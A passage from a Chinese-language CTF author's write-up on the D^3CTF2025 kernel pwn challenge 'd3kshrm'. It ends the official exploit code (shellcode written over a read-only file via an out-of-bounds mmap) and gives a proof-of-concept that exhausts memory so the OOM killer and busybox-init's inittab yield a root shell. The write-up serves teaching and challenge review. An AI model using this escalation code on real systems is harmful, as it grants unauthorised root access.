    log_info("[*] Abusing OOB mmap to overwrite read-only file...");
    memcpy(victim_buf, shellcode, sizeof(shellcode));

    log_success("[+] Just enjoy :)");
}

void banner(void)
{
    puts(SUCCESS_MSG("-------- D^3CTF2025::Pwn - d3kshrm --------") "\n"
    INFO_MSG("--------    Official Exploitation   --------\n")
    INFO_MSG("--------      Author: ")"arttnba3"INFO_MSG("      --------") "\n"
    SUCCESS_MSG("-------- Local Privilege Escalation --------\n"));
}

int main(int argc, char **argv, char **envp)
{
    banner();
    exploit();
    return 0;
}

Unintended Solution

非常抱歉我并未将文件系统配置好，从而导致了非预期解的出现，在开始讲解之前我要感谢最初发现这个问题的来自 W&M 的 Qanux 选手，说实话，这个漏洞的出现是我将文件系统配置得太常规了

一个最小化的能够 在不使用题目模块 的情况下稳定触发非预期解的概念验证函数如下（ prepare_pgv_system() 和 alloc_page() 等函数参见前面的 exp.c ）：

void unintended_exploit(void)
{
    int errno;
    prepare_pgv_system();

    for (int i = 0; i < 1000; i++) {
        if ((errno = create_pgv_socket(i)) < 0) {
            printf(ERROR_MSG("[x] Failed to allocate socket: ") "%d\n", i);
            err_exit("FAILED to allocate socket!");
        }

        if ((errno = alloc_page(i, 0x1000 * 64, 64)) < 0) {
            printf(ERROR_MSG("[x] Failed to alloc pages on socket: ")"%d\n", i);
            err_exit("FAILED to allocate pages!");
        }

        printf("[*] No.%d times\n", i);
        fflush(stdout);
    }

    puts("Done!?");
}

当我们执行这一概念验证时，我们注意到我们的进程突然停止了，随后我们没有原因地得到了一个 root shell：

为什么？ 为了弄清楚在这个过程当中所发生的，让我们简单看看这个 poc，其只是简单地通过 packet socket 的 setsockopt() 系统调用 进行了内存分配 ，我们都知道当一个进程分配并占用了大量内存的情况下，系统会没有足够的空闲内存可用，因此 OOM Killer 会被唤醒以杀死进程来回收内存

哪个进程会被杀掉？我们都知道在这个环境中用户态只有少数几个进程，因此被杀者只会从 rcS 、 sh 、exploit 当中产生，但是谁是那个不幸者呢？好吧， OOM Killer 通过包括资源占用的多种因素来确定受害者，而我们可以通过 /proc/[pid]/oom_score 来判断，分数越高越容易被杀，一个简单的测试结果如下（使用一个简单的 C 函数读取）：

我们可以看到 rcS 与 sh 有着同样的 OOM 分数，其中之一会成为那个不幸者，因为我们的 exploit 的分数更低，而由于 rcS 是 root 权限运行而 sh 不是，似乎杀掉 sh 是有意义的？答案是 是，但不仅仅是是 ，让我们看看真正发生了什么：

他们全都被杀掉来回收内存了！ 但是，为什么？一个非常重要的原因便是在杀掉一个特定进程之后，仍有可能仍旧没有足够的空闲内存能够满足分配请求，这可能是由于异步的内存回收、内存碎片等原因，更重要的是 我们仍在继续进行内存分配 ，因此 OOM killer 会被多次唤醒（甚至在一次分配过程当中），按分数与权限依次杀掉 sh 与 rcS ，并最终杀掉 exploit

若是所有这些进程都被杀掉会发生什么？ 由于 ttyS0 此时被闲置，init 将重新取得控制权并检测到其是闲置的，注意到我们的初始系统使用的是 busybox-init ，因为我们可以看到 /sbin/init 是 busybox 的一个符号链接， busybox-init 将会使用 /etc/inittab 作为其配置，让我们看看笔者在很久之前都参照 official example from the busybox 写了点什么东西：

::sysinit:/etc/init.d/rcS
::askfirst:/bin/ash
::ctrlaltdel:/sbin/reboot
::shutdown:/sbin/swapoff -a
::shutdown:/bin/umount -a -r
::restart:/sbin/init

让我们看看值为 /bin/ash 的 ::askfirst: 项，这是什么意思且在什么时候会被执行？ 当 TTY 上没有进程运行时，由该选项指定的进程会被 /sbin/init 以 root 权限启动 （就像 getty ）

现在我们知道为什么我们能够获得一个 root shell 了：在初始化时 /etc/init.d/rcS 运行在 ttyS0 上并 spawn 了一个用户态 shell 供我们交互，当我们在内核空间进行无限制的内存分配并占用几乎所有的空闲内存时， OOM Killer 会被唤醒并杀掉这些用户态进程，由于此时没有进程在 ttyS0 上运行， 由 ::askfirst: 选项指定的 /bin/ash 将会被执行，给了我们一个 root shell

这也是来自 W&M 的 Qanux 选手在比赛中如何巧合地解出 d3kshrm 的：他只是使用 d3kshrm.ko 的功能进行了内存利用，而由于我的错误配置与错误设计，题目预计的可分配内存比虚拟机的内存大得多，因此 OOM killer 被多次唤醒并杀掉了 init 以外的所有用户态进程，在这之后 ttyS0 被闲置因此 busybox-init 启动了一个 root shell

那么现在又来了另一个问题： 我们是否能够直接在用户空间进行内存分配，而非利用内核的内存分配 API？ 答案是 否定的 ，一个非常重要的原因是如果我们的进程直接分配了大量的内存（例如进行大量的 malloc() 来扩展堆段）， 我们的 OOM score 将会同步快速增长，且我们的 exploit 进程往往会是第一个被杀掉的 ，由于我们被杀掉了，内存分配停止了，因此内核不再需要唤醒 OOM Killer 来杀掉其他内存

在我在比赛过程中得到选手的反馈图片时，我非常迅速地就意识到这必定是 OOM Killer 引起的，但我没有预计到的是包括 rcS 在内的所有进程都被杀掉了，因为这在我以往出过的 CTF 题目中都没有出现过，我原本的预期是 kernel 将会由于 OOM 而 panic，但结果告诉我 kernel 并不总是 panic （哈哈，kernel 也怕死吗？），据选手所言其给出的非预期解的成功率是至少 30% ，但我写的 POC 的成功率超过 99% ，我认为主要原因是使用的 API 不同，由于 packet_set_ring() 使用 vzalloc_nprof() ，其并不向内核请求物理连续的内存区段（而仅是虚拟地址连续），这意味着内存分配可以被从一个高阶分割为数个低阶，但 d3kshrm.ko 中的函数直接调用了 alloc_pages() 来分配高阶内存，因此内核会更容易 panic 因为我们或许无法回收所需的连续的高阶物理内存

我最终如何修复这个漏洞？我创建了该题目的一个复仇版本，仅修改了 /etc/inittab 的 ::askfirst: 从 /bin/ash 变为 /sbin/poweroff 来临时修复这个非预期漏洞，但我认为将其变为 login 或许是更好的选择？无论如何这教导了我一堂课： 一个完美的环境并不总是最适合的 ，且我应当 检查环境当中的每样事物

What’s more…

本题的介绍来自于我非常喜欢的一个由 Halo Top 设计的广告，尽管这个视频或许只是为了乐趣而创造的，但这也给了我一些言语无法表达的特别感受，因此我选择其作为题目描述的基础并修改了一部分以给你们一些无意义的句子，就像 flag 所言：）

我创造这个题目的最初的灵感来自于 CVE-2023-2008 ，其同样是一个 OOB 内存映射的漏洞，因此实话实说这个题目并不如我所预期的那样有难度且有创造性，非常抱歉我虽然一直想给你们展示一些炫酷的东西但这一次并没有展示足够库的玩意

另一个我选择修改现有漏洞的原因是 我确实没有太多时间来完成这些题目 ，由于我已经从本科毕业了，我并没有太关注于我的后辈们今年准备 D^3CTF 的情况，直到 比赛开始的大概 10 天前 才知道今年几乎还没有 pwn 题，因此我不得不在脑子里几乎没有什么新的研究成果的情况下冲刺准备今年的 Pwn 题以确保比赛能像往年一样正常举办， 非常抱歉今年笔者未能带来和 2023 年的 d3kcache 一样炫酷的玩意

而如果你足够注意中国内核模块，你会注意到我在计算 vm_area 的引用计数上写了另一个非预期漏洞： 我忘了写 vm_open() 以添加引用计数，但仍记得写 vm_close() 以减少引用计数！ 这迷惑了不少选手并让他们浪费了很多时间尝试利用这个漏洞，因为实际上其并不好利用，因为页面很难被同时用作用户映射页面与 SLUB 页面（但如果你足够感兴趣，或许你可以看看 CVE-2024-0582 ，其情况与之相似，但我不确定这对 d3kshrm 是否同样有用，所以祝你好运），我非常抱歉因为这道题出得太赶了我没有仔细检查

从整场比赛而言，仅有来自 MNGA 战队的 Tplus 选手成功以预期解法解出了这道题，让我们祝贺这位唯一在比赛期间以预期解解出这道题的选手！ 而来自 W&M 的 Qanux 选手在比赛结束后也同样以预期解法解出了这道题目（因为他没想到还有个 -revenge 版本从而在用非预期解得分后便出去吃大餐了），无论如何我认为我们都应当为他们鼓掌与庆贺

另一个有趣的点是你们或许会忽视 在 kmem_cache 被创建时便会分配一份新的 SLUB 页面 ，这意味着我们的堆风水应当关注于 下一个新分配的 SLUB 页面 ，我认为这是 Tplus 选手与 Qanux 选手所自行编写的预期解法的成功率较低的缘故：他们关注于第一份 SLUB，而我的官方解法关注于第二份 SLUB，因此我的成功利用页级堆风水的概率超过 80% 且在打远程时无需爆破

CTF

#Linux #Linux Kernel #信息安全 #Pwn #CTF #D^3CTF #Heap Overflow #Cross-Cache Overflow #堆风水 #Page-level Heap Fengshui

【CTF.0x0A】D^ 3CTF2025 d3kheap2、d3kshrm 出题手记

https://arttnba3.github.io/2025/06/04/CTF-0X0A_D3CTF2025_D3KHEAP2_D3KSHRM/

作者

arttnba3

发布于

2025年6月4日

许可协议

【OPS.0x06】使用 Ollama 本地部署轻量LLM 下一篇